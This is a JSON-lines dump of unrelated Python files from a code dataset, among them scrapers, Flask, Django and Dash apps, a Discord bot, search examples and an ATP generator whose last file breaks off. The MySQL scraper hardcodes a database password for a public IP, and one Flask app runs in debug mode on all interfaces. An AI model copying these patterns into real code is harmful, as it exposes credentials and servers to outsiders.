{"seq_id":"392732084","text":"# Hanbit Media - store - scrape the full book list and store it in the Allbooks table (mysql)\n\nimport csv\nimport pymysql\nimport requests\nimport lxml.html\n\n# create connection\nconn = pymysql.connect(host='13.125.178.188', port=3306, user='my', password='123456', db='my', charset='utf8')\n\n# create cursor\nmycursor = conn.cursor()\n\nsqlDropT = 'DROP TABLE if exists allbooks;'\nsqlCreateT = 'create table allbooks(id int auto_increment, bookname varchar(200), booklink varchar(200),primary key (id))'\nsqlInsertT = 'insert into allbooks (bookname, booklink) values (%s, %s)'\nsqlCheckT = \"show tables like 'allbooks'\"\nIsCreate = mycursor.execute(sqlCheckT)\n\n# # create the DB table\n# if 'if exists(select * from allbooks where sno=1 )' == 1:\nmycursor.execute(sqlDropT)\n# else:\n# mycursor.execute(sqlCreateT)\n#\n# mycursor.execute(sqlCreateT)\n\n# fetch the data by crawling\n#1 target url\nurl = 'http://www.hanbit.co.kr/store/books/full_book_list.html'\n\n#2 fetch the data via request & response\nres = requests.get(url)\n\n#3 store the response body as text for later use\nhtml = res.text\n\n#4 parse the text data\nparsed_html = lxml.html.fromstring(html)\n\n# create the DB table\nmycursor.execute(sqlCreateT)\n\nwith open('data/allbooks.csv', 'w', encoding='utf-8', newline='') as f:\n bookcsv = csv.writer(f)\n for part_html in parsed_html.xpath('//td[@class=\"left\"]/a'):\n # save to csv\n bookcsv.writerow([part_html.text_content(), 'http://www.hanbit.co.kr'+part_html.get('href')]) # don't forget the brackets\n # save to MariaDB\n mycursor.execute(sqlInsertT, (part_html.text_content(), part_html.get('href')))\n print(part_html.text_content())\n\nsqlResult = 'select * from 
allbooks'\nmycursor.execute(sqlResult)\n\nconn.commit()\nconn.close()\n\n\n","sub_path":"py1810/hello_mysql_02.py","file_name":"hello_mysql_02.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"265983294","text":"import dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\ncolors = {\n 'background': '#111111',\n 'text': '#7FDBFF'\n}\n\n# Gapminder dataset GAPMINDER.ORG, CC-BY LICENSE\nurl = \"https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv\"\ndf = pd.read_csv(url)\ndf = df.rename(index=str, columns={\"pop\": \"population\",\n \"lifeExp\": \"life_expectancy\",\n \"gdpPercap\": \"GDP_per_capita\"})\n\nlayout = html.Div([\n html.Div(style={'backgroundColor': colors['background']}, children=[\n html.H1(\n children='Hello Dash',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }\n ),\n html.Div(children='Dash: A web application framework for Python.',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }),\n dcc.Graph(\n id='Graph1',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar',\n 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar',\n 'name': u'Montréal'},\n ],\n 'layout': {\n 'plot_bgcolor': colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font': {\n 'color': colors['text']\n }\n }\n }\n )\n ]),\n html.H1('Stock Tickers'),\n dcc.Dropdown(\n id='my-dropdown',\n options=[\n {'label': 'Coke', 'value': 'COKE'},\n {'label': 'Tesla', 'value': 'TSLA'},\n {'label': 'Apple', 'value': 'AAPL'}\n ],\n value='COKE'\n ),\n dcc.Graph(id='my-graph'),\n dcc.Input(\n className=\"form-control\",\n id='my_input',\n placeholder='Enter a value...',\n type='text',\n value=''\n ),\n html.Div(id='my-div'),\n dcc.Dropdown(\n id='country-dropdown',\n options=[{'label': i, 'value': i} for i in df.country.unique()],\n multi=True,\n value=['Australia']\n ),\n\n dcc.Graph(id='timeseries-graph')\n], style={'width': '500'}, className=\"container\", )\n","sub_path":"app/dashapp2/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"535675772","text":"import pandas as pd\nimport numpy as np\nimport xlrd\n\n\nclass ChartData:\n def __init__(self):\n pass\n\n # Parse the spreadsheet files to get the opened/closed-case counts and region info; the counts can be viewed as a matrix\n def get_sja_data(self):\n sa_number = []\n ja_number = []\n region = []\n for i in range(1, 10):\n url = 'C:\\\\Users\\\\WSK\\\\PycharmProjects\\\\Django\\\\data\\\\sjayc\\\\df0' + str(i) + '.xlsx'\n excel = xlrd.open_workbook(url)\n sheet = excel.sheet_by_name('Sheet1')\n sa_data = sheet.col_values(3, 1)\n ja_data = sheet.col_values(2, 1)\n region = sheet.col_values(1, 1)\n region = [x+'区' for x in region]\n sa_number.append(sa_data)\n ja_number.append(ja_data)\n for i in range(10, 41):\n url = 'C:\\\\Users\\\\WSK\\\\PycharmProjects\\\\Django\\\\data\\\\sjayc\\\\df' + str(i) + '.xlsx'\n excel = xlrd.open_workbook(url)\n sheet = excel.sheet_by_name('Sheet1')\n sa_data = sheet.col_values(3, 1)\n ja_data = sheet.col_values(2, 1)\n sa_number.append(sa_data)\n ja_number.append(ja_data)\n return sa_number, ja_number, region\n\n # Aggregate the monthly opened/closed-case data into yearly figures for 2016-2019\n def get_sjayear_data(self, sja_data):\n year_data = []\n for i in range(3):\n year_meta_data = [0 for x in range(len(sja_data[0]))]\n for j in range(12):\n k = j + 12 * i\n for l in range(len(sja_data[0])):\n year_meta_data[l] 
= year_meta_data[l] + sja_data[k][l]\n year_data.append(year_meta_data)\n year_meta_data = [0 for x in range(len(sja_data[0]))]\n for j in range(36, 40):\n for l in range(len(sja_data[0])):\n year_meta_data[l] = year_meta_data[l] + sja_data[j][l]\n year_data.append(year_meta_data)\n return year_data\n\n # Build the map data\n def get_map_data(self, region, sa_number):\n map_data = []\n for i in range(len(region)):\n map_meta_data = {}\n map_meta_data['name'] = region[i]\n map_meta_data['value'] = sa_number[i]\n map_data.append(map_meta_data)\n return map_data\n\n # Build the yearly data for the bar chart and the map, returned directly to the view\n def get_his_data(self):\n sa_number, ja_number, region = ChartData().get_sja_data()\n sa_data = ChartData().get_sjayear_data(sa_number)\n ja_data = ChartData().get_sjayear_data(ja_number)\n data = []\n for x in range(4):\n meta_data = {}\n meta_data['date'] = str(x+2016)\n meta_data['chart_region'] = region\n meta_data['chart_sa_number'] = sa_data[x]\n meta_data['chart_ja_number'] = ja_data[x]\n meta_data['map'] = ChartData().get_map_data(region, sa_data[x])\n data.append(meta_data)\n return data\n\n # Get the 40 months of data grouped by region\n def get_region_data(self):\n chart_date = [\n '2016-01-31', '2016-02-29', '2016-03-31', '2016-04-30',\n '2016-05-31', '2016-06-30', '2016-07-31', '2016-08-31',\n '2016-09-30', '2016-10-31', '2016-11-30', '2016-12-31',\n '2017-01-31', '2017-02-28', '2017-03-31', '2017-04-30',\n '2017-05-31', '2017-06-30', '2017-07-31', '2017-08-31',\n '2017-09-30', '2017-10-31', '2017-11-30', '2017-12-31',\n '2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',\n '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31',\n '2018-09-30', '2018-10-31', '2018-11-30', '2018-12-31',\n '2019-01-31', '2019-02-28', '2019-03-31'\n ]\n sa_number, ja_number, region = ChartData().get_sja_data()\n region_data = []\n for i in range(len(region)):\n region_meta_data = {}\n region_sa_number = []\n region_ja_number = []\n for j in range(len(sa_number)):\n region_sa_number.append(sa_number[j][i])\n region_ja_number.append(ja_number[j][i])\n region_meta_data['region'] = region[i]\n region_meta_data['chart_date'] = chart_date\n region_meta_data['chart_sa_number'] = region_sa_number\n region_meta_data['chart_ja_number'] = region_ja_number\n region_data.append(region_meta_data)\n return region_data\n\n# Return the date data and region data\ndate_data = ChartData().get_his_data()\nregion_data = ChartData().get_region_data()\n\n\n\n","sub_path":"django_web/sjayc_data.py","file_name":"sjayc_data.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"257885574","text":"from flask import Flask\nfrom flask import render_template, request, jsonify\nimport joblib\nimport json\nimport pandas as pd\n\napp = Flask(__name__)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n# open parameters JSON file\nwith open('../models/parameters.json') as json_file:\n parameters = json.load(json_file)\n\n# open column json\nwith open('../models/columns.json') as json_file:\n columns = json.load(json_file)\n\n# setup webapp routes\n@app.route('/')\n@app.route('/index')\n\n# home page route\ndef index():\n return render_template('index.html', parameters=parameters)\n\n# view results route\n@app.route('/run')\ndef run():\n # create a dict object from request parameters\n house = request.args.to_dict(flat=True)\n\n # convert any number parameters to int\n for key in house.keys():\n param_type = parameters[key]['type']\n\n if param_type == 'number':\n house[key] = int(house[key])\n\n # create a 
dataframe from the parameter dict\n df = pd.DataFrame(house, index=[0])\n # create dummy variables for categorical features\n df = pd.get_dummies(df)\n # add missing columns and fill with 0\n df = df.reindex(columns=columns, fill_value=0)\n\n # use model to predict house price for query\n value = model.predict(df)[0]\n\n # render results\n return render_template(\n 'run.html',\n value=value\n )\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\nif __name__ == '__main__':\n main()\n","sub_path":"webapp/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"137041538","text":"from pyspark.sql.types import StructType, StructField, StringType\n\nimport pyspark.sql.functions as f\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_input_data(ctx, input_data, prev_col_names, expected_fields):\n\n # create spark session and spark context\n ss = ctx.spark_session\n\n # Determine the existing schema\n logger.info(\"prev_col_names: \"+str(prev_col_names))\n\n validate = True\n\n # get object representing the filesystem of the input dataset\n fs = input_data.filesystem()\n raw_underlying_files = fs.files()\n ls_result = fs.ls()\n for fls in ls_result:\n logger.info(\"===== DEVELOPER fs: {}\".format(fls.path))\n\n logger.info(\"=== raw not empty: {}\".format(raw_underlying_files.count() > 0))\n\n if raw_underlying_files.count() > 0:\n # create base file path of underlying files based on filesystem path\n base_file_path = (fs.hadoop_path + '/')\n\n logger.info(\"==== base path: {}\".format(base_file_path))\n\n # get list of objects representing each file underlying the input dataset\n filename_list = [r['path'] for r in raw_underlying_files.collect()]\n\n logger.info(\"===== filename_list: {}\".format(filename_list))\n\n all_col_names = set(prev_col_names)\n dfArray = []\n\n for filename in filename_list:\n logger.info(\"Reading \" + filename)\n full_file_path = base_file_path + filename\n curr_df = ss.read.format('csv').option('header', 'true').option(\n 'multiLine', 'true').option('delimiter', \",\").load(full_file_path)\n col_names = curr_df.columns\n all_col_names.update(col_names)\n dfArray.append(curr_df)\n\n logger.info(\"all_col_names: \"+str(all_col_names))\n\n masterDFComputed = []\n for df in dfArray:\n logger.info(\"processing dataframe\")\n for col in all_col_names:\n if col not in df.columns:\n logger.info(\"adding col \"+col)\n df = df.withColumn(col, f.lit(None))\n masterDFComputed.append(df)\n\n logger.info(\"len(masterDFComputed): \"+str(len(masterDFComputed)))\n\n all_col_names = sorted(all_col_names)\n if validate:\n full_schema = StructType([StructField(c, StringType(), True) for c in sorted(expected_fields)])\n else:\n full_schema = StructType([StructField(c, StringType(), True) for c in sorted(all_col_names)])\n\n master_df = ss.createDataFrame(data=[], schema=full_schema)\n\n # masterDFSorted = []\n for calc_df in masterDFComputed:\n calc_df = calc_df.select(all_col_names)\n master_df = master_df.union(calc_df)\n\n return master_df\n","sub_path":"latest_integration/transforms-python/src/python/pnl/typed/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"582940243","text":"\"\"\"\n Initializer for the Worker-building module\n\n Metaclass that assembles workers for further use.\n\"\"\"\n\n\nclass 
WorkerMeta(type):\n def __new__(cls, name, bases, dct):\n # Skip the parent class\n if name == 'WorkerCreator':\n # The __new__() method must always return a class\n return super(WorkerMeta, cls).__new__(cls, name, bases, dct)\n # Give the worker the key attribute that stops its work\n dct['keep_going'] = True\n # Create a logger if the user provided its configuration\n if \"logger_conf_name\" in dct:\n clog = {}\n clog['logger_name'] = dct.get(\"logger_conf_name\", name)\n clog['path_to_file'] = dct.get(\"logger_conf_path\", \"logs/\" + name + \".log\")\n clog['message_level'] = dct.get(\"logger_conf_level\", \"DEBUG\")\n clog['message_format'] = dct.get(\"logger_conf_format\", \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n from ..samples.loggers import logger_create # Import the logger factory\n dct['logger'] = logger_create(clog) # Create a logger for this module\n # Return the finished worker\n return super(WorkerMeta, cls).__new__(cls, name, bases, dct)\n\n\nclass WorkerCreator(metaclass=WorkerMeta):\n def run(self):\n while self.keep_going:\n self.logic()\n","sub_path":"framework/workers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"372337807","text":"# Derived from a modification of a test script by Rapptz, by TAOTheCrab, by me.\n# (You get all that?)\n\nimport discord\nimport logging\nimport os.path\nimport random\nimport tasks\nimport yaml\n\nclient = discord.Client()\n\nlogging.basicConfig(level=logging.INFO)\n\n# For interactions in the mudquest text channel\ntry:\n import mudquest\n mq = mudquest.Game()\n mq_online = True\nexcept ImportError:\n mq_online = False\n\n# For !mudbot\ntry:\n from cleverbot import Cleverbot\n cb = Cleverbot()\n cb_online = True\nexcept ImportError:\n cb = None\n cb_online = False\n\n# Create quotes.json if it doesn't exist.\nif not os.path.isfile(\"quotes.json\"):\n file = open(\"quotes.json\", \"w+\")\n file.write(\"{}\")\n file.close()\n\n\n@client.event\nasync def on_ready():\n print(\"Logged in as\")\n print(client.user.name)\n print(client.user.id)\n print(\"------\")\n\n\n@client.event\nasync def on_message(message):\n # We do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n info = (client, message)\n\n await tasks.general.run(*info) # update, echo/anonecho, whoami, whereami\n await tasks.chance.run(*info) # 8ball, roll, flip, burn/burn anon\n await tasks.quotes.run(*info) # quotes\n await tasks.chatbot.run(*info, cb_online, cb) # !mudbot (chat with Cleverbot)\n await tasks.mudquest.run(*info, mq_online) # Play Mudquest\n\n\nwith open(\"config.yml\") as file:\n config = yaml.safe_load(file)\n\ntoken = config[\"token\"]\n\nclient.run(token)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"380339770","text":"from flask import (Blueprint,\n render_template,\n url_for,\n redirect\n )\nfrom flask_login import current_user, login_required\n\n\nfrom pygments.lexers import get_lexer_for_filename, get_lexer_by_name\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\n\nimport difflib\n\nfrom sacca.web import acl, forms\nfrom sacca import models\n\nmodule = Blueprint('teaching_assistants.solutions',\n __name__,\n url_prefix='/solutions',\n 
)\n\n@module.route('/')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef index():\n return render_template('/administration/solutions/view.html')\n\n\n\n@module.route('/<solution_id>')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef view(solution_id):\n solution = models.Solution.objects.get(id=solution_id)\n code = solution.code.read().decode()\n\n lexer = get_lexer_for_filename(solution.code.filename)\n\n formatter = HtmlFormatter(linenos=True)\n formated_code = highlight(code, lexer, formatter)\n style = formatter.get_style_defs('.highlight')\n\n console_lexer = get_lexer_by_name(\"console\")\n return render_template('/administration/solutions/view.html',\n solution=solution,\n formated_code=formated_code,\n console_lexer=console_lexer,\n formatter=formatter,\n highlight=highlight,\n difflib=difflib,\n style=style)\n\n\n\n@module.route('/<solution_id>/code')\n@acl.allows.requires(acl.is_teaching_assistant)\ndef download_code(solution_id):\n solution = models.Solution.objects.get(id=solution_id)\n return render_template('/administration/solutions/code.html',\n solution=solution)\n\n\n\n","sub_path":"sacca/web/views/teaching_assistants/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"159538747","text":"from django.shortcuts import render,redirect\nfrom products import models as products_models\nfrom . import models, forms\nfrom django.http import JsonResponse, HttpResponse\nimport json\nfrom django.forms.models import model_to_dict\n# Create your views here.\ndef index_sl(req):\n\t# sales = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SalesForm()\n\tsaledetail=models.SaleDetail.objects.all()\n\tif req.POST:\n\t\tform = forms.SalesForm(req.POST)\n\t\tif form.is_valid():\n\t\t\tform.instance.owner = req.user\n\t\t\tsale = form.save()\n\t\t\treturn redirect('/sales/{}'.format(sale.id))\n\treturn render(req, ('sales/index.html'), {\n\t\t# 'data1' : sales,\n\t\t'form' : form,\n\t\t'detail' : saledetail,\n\t\t})\n\ndef index(req):\n\tsale = models.Sale.objects.all()\n\n\tsaledetailbyid = [] # convert the django queryset into a plain list of dicts\n\tfor p in sale:\n\t\tsaledetailbyid.append(model_to_dict(p))\n\treturn JsonResponse({'data': saledetailbyid})\n\ndef show_detail(req, id):\n\tif req.method == 'GET':\t\n\t\tshowdetail = models.Sale.objects.filter(pk=id).first()\n\t\tdetailbyid = showdetail.sesuai.all()\n\n\t\tshowbysale = []\n\t\tfor s in detailbyid:\n\t\t\tshowbysale.append(model_to_dict(s))\n\t\treturn JsonResponse({\n\t\t\t'show' : showbysale\n\t\t\t# 'show' : model_to_dict(showbysale.instance)\n\t\t})\n\ndef sale_detail(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SaleDetail()\n\tif req.method == 'POST':\n\t\tdata_byte = req.body\n\t\tdata_string = str(data_byte, 'utf-8')\n\t\tdata = json.loads(data_string)\n\n\t\tsale = models.Sale.objects.create()\n\t\tfor order in data['orders']:\n\t\t\tdetailbyprod = products_models.Prod.objects.filter(pk=order['products']).first()\n\t\t\tform = forms.SaleDetail(order)\n\n\t\t\tif form.is_valid():\n\t\t\t\tform.instance.sale = sale\n\t\t\t\tform.instance.products = detailbyprod\n\t\t\t\tsd=form.save()\n\t\t\t\tstok_baru = sd.products.stok-order['qty']\n\t\t\t\tproducts_models.Prod.objects.filter(pk=sd.products.id).update(stok=stok_baru)\n\t\tsaledetail=models.SaleDetail.objects.filter(sale=sale)\n\t\ttotal=0\n\t\tfor t in saledetail:\n\t\t\ttotal+=t.total()\n\t\treturn 
JsonResponse({\n\t\t\t'total':total,\n\t\t\t'sale':model_to_dict(sale),\n\t\t})\n\n\treturn JsonResponse({\n\t\t\t'error': 'must be POST',\n\t\t})\n\ndef transaksi(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tsale = models.Sale.objects.all()\n\ttotal =0\n\tfor p in sale:\n\t\ttotal+=p.total()\n\n\treturn render(req, ('transaksi/list_transaksi.html'), {\n\t\t'data' : sale,\n\t\t'total': total,\n\t\t# 'data' : tasks,\n\t\t})\n\ndef input(req):\n\t# tasks = models.Sale.objects.filter(owner=req.user)\n\tform = forms.SalesForm()\n\n\tif req.POST:\n\t\tform = forms.SalesForm(req.POST)\n\t\tif form.is_valid():\n\t\t\tform.instance.owner = req.user\n\t\t\tform.save()\n\t\t\n\t\treturn redirect('/sales')\n\n\tsale = models.Sale.objects.all()\n\treturn render(req, ('sales/input.html'), {\n\t\t'data' : sale,\n\t\t'form' : form,\n\t\t})\n\ndef cetak(req):\n\tsales = models.Sale.objects.all()  # renamed from 'print' to avoid shadowing the built-in\n\treturn render(req, ('sales/print.html'), {\n\t\t'data' : sales,\n\t\t})\n\t\ndef delete(req, id):\n\tmodels.Sale.objects.filter(pk=id).delete()\n\treturn redirect('/sales')\n\ndef detail(req, id):\n\tsale = models.Sale.objects.filter(pk=id).first()\n\tsaledetail=models.SaleDetail.objects.filter(sale=sale)\n\treturn render(req, 'sales/detail.html', {\n\t\t'data': sale,\n\t\t'datadetail': saledetail,\n\t\t})\n\ndef delete_detail(req,id,id_detail):\n\tmodels.SaleDetail.objects.filter(pk=id_detail).delete()\n\t# stok_detail = products.stok+qty\n\t# products_models.Prod.objects.filter(pk=sale.products.id).update(stok=stok_detail)\n\treturn redirect(f'/sales/{id}/detail')\n\n","sub_path":"sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"414130626","text":"''''''\n'''Linear Search'''\n''''''\ndef linear_search(list, target):\n for i, item in enumerate(list):\n if target==item:\n return i\n return None\n\ndef linear_search(list, target):\n for i in range(0, len(list)):\n if list[i]==target:\n return i\n return None\n\n\n\n\ndef verify(index):\n if index is not None:\n print(f\"Target Found at index: {index}\")\n else:\n print(\"Target not found in list\")\n\n\nnumbers = [n for n in range(-11,11)]\n\n'''check if everything works as expected'''\n'''if each one of them produces an unexpected result, then the algorithm is not working'''\n\n# r = linear_search(numbers, 6)\n# verify(r)\n#\n# r = linear_search(numbers, 12)\n# verify(r)\n\n\n\n\n\n\n\n\n''''''\n'''Binary Search'''\n''''''\n\n'''runs in constant space'''\n\ndef binary_search(list, target):\n first = 0\n last = len(list)-1\n while first <= last:\n midpoint = (first+last)//2\n if list[midpoint]==target:\n return midpoint\n elif list[midpoint] None:\n \"\"\"Initialize.\"\"\"\n super().initialize()\n\n self.listen_ios_event(\n self.response_from_push_notification,\n self.properties['ios_emptied_key'])\n self.listen_state(\n self.power_changed,\n self.app.entities['power'],\n constrain_input_boolean=self.enabled_entity_id)\n self.listen_state(\n self.status_changed,\n self.app.entities['status'],\n constrain_input_boolean=self.enabled_entity_id)\n\n def power_changed( # pylint: disable=too-many-arguments\n self, entity: Union[str, dict], attribute: str, old: str, new: str,\n kwargs: dict) -> None:\n \"\"\"Deal with changes to the power draw.\"\"\"\n power = float(new)\n if (self.app.state != self.app.States.running\n and power >= self.properties['running_threshold']):\n self.log('Setting dishwasher 
to \"Running\"')\n\n self.app.state = (self.app.States.running)\n elif (self.app.state == self.app.States.running\n and power <= self.properties['drying_threshold']):\n self.log('Setting dishwasher to \"Drying\"')\n\n self.app.state = (self.app.States.drying)\n elif (self.app.state == self.app.States.drying\n and power == self.properties['clean_threshold']):\n self.log('Setting dishwasher to \"Clean\"')\n\n self.app.state = (self.app.States.clean)\n\n def status_changed( # pylint: disable=too-many-arguments\n self, entity: Union[str, dict], attribute: str, old: str, new: str,\n kwargs: dict) -> None:\n \"\"\"Deal with changes to the status.\"\"\"\n if new == self.app.States.clean.value:\n self.handles[HANDLE_CLEAN] = self.notification_manager.repeat(\n 'Dishwasher Clean 🍽',\n \"Empty it now and you won't have to do it later!\",\n self.properties['notification_interval'],\n when=self.datetime() + timedelta(minutes=15),\n target='home',\n data={'push': {\n 'category': 'dishwasher'\n }})\n elif old == self.app.States.clean.value:\n if HANDLE_CLEAN in self.handles:\n self.handles.pop(HANDLE_CLEAN)()\n\n def response_from_push_notification(\n self, event_name: str, data: dict, kwargs: dict) -> None:\n \"\"\"Respond to iOS notification to empty the appliance.\"\"\"\n self.log('Responding to iOS request that dishwasher is empty')\n\n self.app.state = self.app.States.dirty\n\n target = self.notification_manager.get_target_from_push_id(\n data['sourceDevicePermanentID'])\n self.notification_manager.send(\n 'Dishwasher Emptied',\n '{0} emptied the dishwasher.'.format(target),\n target='not {0}'.format(target))\n\n\nclass WasherDryer(Base):\n \"\"\"Define an app to represent a washer/dryer-type appliance.\"\"\"\n\n class States(Enum):\n \"\"\"Define an enum for states.\"\"\"\n\n clean = 'Clean'\n dirty = 'Dirty'\n drying = 'Drying'\n running = 'Running'\n\n @property\n def state(self) -> Enum:\n \"\"\"Get the state.\"\"\"\n return self.States(self.get_state(self.entities['status']))\n\n @state.setter\n def state(self, value: Enum) -> None:\n \"\"\"Set the state.\"\"\"\n self.select_option(self.entities['status'], value.value)\n","sub_path":"appdaemon/settings/apps/washer_dryer.py","file_name":"washer_dryer.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497755179","text":"###############################################################################\r\n##\r\n## Copyright 2011 Tavendo GmbH\r\n##\r\n## Licensed under the Apache License, Version 2.0 (the \"License\");\r\n## you may not use this file except in compliance with the License.\r\n## You may obtain a copy of the License at\r\n##\r\n## http://www.apache.org/licenses/LICENSE-2.0\r\n##\r\n## Unless required by applicable law or agreed to in writing, software\r\n## distributed under the License is distributed on an \"AS IS\" BASIS,\r\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n## See the License for the specific language governing permissions and\r\n## limitations under the License.\r\n##\r\n###############################################################################\r\n\r\nimport sys, shelve\r\nfrom twisted.python import log\r\nfrom twisted.internet import reactor\r\nfrom autobahn.websocket import listenWS\r\nfrom autobahn.wamp import exportRpc, WampServerFactory, WampServerProtocol\r\n\r\n\r\nclass KeyValue:\r\n \"\"\"\r\n Simple, persistent key-value store.\r\n \"\"\"\r\n\r\n def __init__(self, 
filename):\r\n self.store = shelve.open(filename)\r\n\r\n @exportRpc\r\n def set(self, key = None, value = None):\r\n if key is not None:\r\n k = str(key)\r\n if value is not None:\r\n self.store[k] = value\r\n else:\r\n if self.store.has_key(k):\r\n del self.store[k]\r\n else:\r\n self.store.clear()\r\n\r\n @exportRpc\r\n def get(self, key = None):\r\n if key is None:\r\n return self.store.items()\r\n else:\r\n return self.store.get(str(key), None)\r\n\r\n @exportRpc\r\n def keys(self):\r\n return self.store.keys()\r\n\r\n\r\nclass KeyValueServerProtocol(WampServerProtocol):\r\n \"\"\"\r\n Demonstrates creating a server with Autobahn WebSockets that provides\r\n a persistent key-value store which we can access via RPCs.\r\n \"\"\"\r\n\r\n def onSessionOpen(self):\r\n ## register the key-value store, which resides on the factory within\r\n ## this connection\r\n self.registerForRpc(self.factory.keyvalue, \"http://example.com/simple/keyvalue#\")\r\n\r\n\r\nclass KeyValueServerFactory(WampServerFactory):\r\n\r\n protocol = KeyValueServerProtocol\r\n\r\n def __init__(self, url):\r\n WampServerFactory.__init__(self, url)\r\n\r\n ## the key-value store resides on the factory object, since it is to\r\n ## be shared among all client connections\r\n self.keyvalue = KeyValue(\"keyvalue.dat\")\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n log.startLogging(sys.stdout)\r\n factory = KeyValueServerFactory(\"ws://localhost:9000\")\r\n listenWS(factory)\r\n reactor.run()\r\n","sub_path":"demo/rpc/keyvalue/keyvalue_server.py","file_name":"keyvalue_server.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"237649750","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/7/20\n# @Author : RoyYoung\n\n\"\"\"\nGenerator class for ATP files\n\"\"\"\nimport os\nimport shutil\n\nfrom Config import Config\nfrom atp.LccLib import LccLib\nfrom atp.ParseHandler import ParseHandler\nfrom utils import ArgSet\nfrom utils.ArgToList import ArgvToList\nfrom utils.Convert import Convert\nfrom utils.Triple import Triple\n\n\nclass CreateAtp(object):\n def __init__(self, path, fileName, parseHandler, bpa, configPath):\n print(path, fileName, configPath)\n\n self.__path = path\n self.__fileName = fileName\n self.__handler = parseHandler\n self.bpa = bpa\n Config.set_config_path(configPath)\n\n self.__switch_list = []\n\n # first remove temp files left over from the previous run\n if os.path.isdir(self.__path + '/temp'):\n shutil.rmtree(self.__path + '/temp')\n\n def create(self, atp, argDic: dict):\n \"\"\"\n Generate the atp files\n :param atp: path of the atp file\n :param argDic: dict of all parameter settings {\"switch\": switch_arg_set}\n :return:\n \"\"\"\n print('create arg dic:')\n total = Config.get_total_times()\n\n for k in argDic:\n print(k)\n print(argDic[k].argList)\n\n # create the parent directory\n dir = self.__path + '/temp'\n if not os.path.exists(dir):\n os.mkdir(dir)\n\n for time in range(int(total)):\n # initialize the local component lists\n # branch = self.__handler.branch.values()\n branch = self.create_branch(argDic[\"branch\"], total, time + 1)\n lcc = self.create_lcc(argDic['lcc'])\n\n switch = self.create_switch(argDic[\"switch\"], total, time + 1)\n # switch.extend(self.bpa.createSwitch(total, time + 1))\n for s in self.bpa.createSwitch(total, time + 1):\n if s.getNodes() in self.__handler.switch:\n switch.append(s)\n\n source = self.create_source(argDic['source'], total, time + 1)\n # source.extend(self.bpa.createSource(total, time + 1))\n for s in self.bpa.createSource(total, time + 1):\n if s.getNodes() in self.__handler.source:\n 
source.append(s)\n\n arrester = self.create_arrester(argDic['arrester'], total, time + 1)\n thunder = self.create_thunder(argDic['thunder'], total, time + 1)\n output = self.__handler.output\n\n # create the output directory and file\n dir = self.__path + '/temp/' + self.__fileName + \"_%d\" % time\n if not os.path.exists(dir):\n os.mkdir(dir)\n shutil.copy(atp, dir)\n self.__file = open(dir + \"/\" + self.__fileName + '.atp', 'w+', encoding='cp1252')\n\n # write the file header\n self.__infoWrite(self.__handler.info)\n\n # write the file body\n self.__branchWrite(branch)\n self.__arresterWrite(arrester)\n self.__lccWrite(lcc)\n self.__switchWrite(switch)\n self.__sourceWrite(source)\n self.__thunderWrite(thunder)\n self.__outputWrite(output)\n\n # write the file footer\n self.__file.writelines(\n [\"BLANK BRANCH\\n\",\n \"BLANK SWITCH\\n\",\n \"BLANK SOURCE\\n\",\n \"BLANK OUTPUT\\n\",\n \"BLANK PLOT\\n\",\n \"BEGIN NEW DATA CASE\\n\",\n \"BLANK\\n\"])\n self.__file.close()\n\n def create_switch(self, dicSwitch: ArgSet, total, time):\n \"\"\"\n Create switch entries from the parameter settings\n :param dicSwitch: argDic['switch']\n :param total: 3\n :param time: 1 2 3\n :return: the generated switch entries\n \"\"\"\n 